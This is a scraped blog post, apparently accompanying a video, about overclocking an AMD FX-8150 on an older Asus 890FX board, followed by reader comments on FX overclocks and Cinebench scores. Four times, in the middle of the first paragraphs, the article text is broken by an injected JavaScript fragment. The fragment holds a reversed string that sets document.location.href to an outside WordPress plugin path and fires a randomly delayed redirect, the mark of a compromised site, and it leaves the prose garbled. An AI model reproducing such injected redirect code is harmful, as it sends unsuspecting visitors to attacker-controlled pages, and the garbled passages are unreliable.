AMD FX 8150 Overclocking on an Asus 890fx AM3 Motherboard

Using an AM3 890fx chipset motherboard toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to overclock the O.G. AMD Bulldozer, the 8150 – I wanted toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to see if this older high end motherboard would work on an AM3+ CPU and see how the CROSSHAIR IV FORMULA performs now that it’s 8 years old.

I also believe the cinebench result was not as high as it should have been, trying toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to figure out why.

Have some old cool PC tech you want toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to share? Email: me@timmyjoe.com

got 8300 set to 4.2 1.36v with cinebench score over 650. you should disable cool n quiet c6 and c1 as well loadlines set to extreme.
weird thing win 10 reads as a 4 core 8 threat . maybe the poor performance of fx chips are based of that are not an actual 8 cores cpus lol

  2. Venelin Savof says:

I got still my fx 6350 4,2ghz and run well with the latest games 🙂 Great cheap solution 🙂

  3. Bill Killernic says:

you need a 990FX motherboard to power the fx 9590 cpu

  4. james lane says:

I miss my 8350 5.3GHZ @1.35V then I sold it to my friend and got a 7700K for cheap on Craigslist thanks to the Spectre exploit.

    nice model M

  6. Luredreier says:

Reinstalling windows might help a tiny bit.

  7. Xin Gaming says:

FX cpu is still good!! I have 1800x and rx 580 now but i still gaming most of the time with my fx 8350 and a r7 370x we put the system on our family room for gaming and media use.

  8. Erenzilable says:

mobo is bad, no ram overclocking, no VRM cooling, no NB overclocking, windows install is not fresh. no wonder cb score is low.
also IPC is important, but go ahead and try to play new games on, say, i5 7500. IPC is great, but it's only 4c4t. FX has 8 cores, 8 threads (w10 writes it as 4c8t because FPU block is a single unit per 2 cores). average framerate might be higher on 4c i5, but frametimes would be all over the place

  9. Keith Rice says:

fx-8120 OC to 4018Mhz scored 607, then OC to 4.7Ghz scored 746. and this was all done with the stock cooler, but also on an AM3+ MoBo

I love how you say that the video was too long at the 8-minute mark and then proceed to have the video go on for 2 more minutes! Lol.

  11. Acid001 says:

That long pipeline allowed those FX chips to soar in overclocking, but it didn't really improve performance much. I stuck with the Phenom up until Ryzen. I have an R5 1600 now, and it's SO much better. I've scored a 1394 @ 4Ghz on my chip doing Cinebench R15. Talk about improvement over the FX series.

  12. Warren Puckett says:

MSI 890fxa-GD70 and FX 8350 good for OC, but only at 4250 Mhz and 1.28 volts. Have it running on a old XFX 1000 PWR supply with a HD 7790. I think the 7790 is newest part

  13. FULLMETALVAMP87 says:

Pair these old parts with a 1050ti and its 1080p bliss

  14. Ραφαήλ Καμπαδάκης says:

wow, my fx 8320 at @4.82ghz get 752cb at cinebench

  15. hartsickdisciple says:

Faildozer is right. I have an i5-3570k running at 4.4ghz. It scores 618 in Cinebench R15. That's 4 cores and 4 threads from 2012 beating the 8-core FX-8150 pretty soundly.

  16. Matt Hunter says:

I have a still have 965 X4 phenom still , i sold my fx 4100 and 6300 was not impressed with the fx line, in fact my phenom does much better on dolphin emulator than any fx cpu i once had, of course my i7 3960x is my ultimate emulator machine.

  17. Mark Hannelly says:

This comment is being written on my custom build, running an AMD FX- 9590 😉

  18. Dat boi Jr says:

    You should do a 8320

  19. JoeNoIce says:

i have the 8150 but i underclocked it to 3.5 for it to stay super stable and i love it tho it aint my main rig. my main rig is an 1800x ryzen

  20. Daniel Rappuhn says:

if you turn off hcc or what ever setting it is in the fx bios it really improves scores all around. i can hit 682 on cinebench r15 @ 4.5ghz

  21. PREDATEURLT says:

your cinebench score is to low at 4.8ghz 559, I am getting 623 at 4.1Ghz…

  22. TheRailroad99 says:

mine does 700cb @ 4.3 Ghz with very cheap no name DDR3 on a 970-UD3…
something is not ok with your rig

  23. Crixus The Gaul says:

I noticed almost zero difference in games between my phenom ii x4 and my 8350.. few FPS

  24. Alkoon Soft says:

I'm not native English speaker can you put processors name on the scree so I can read it properly since I can't catchup with you spelling processor naem
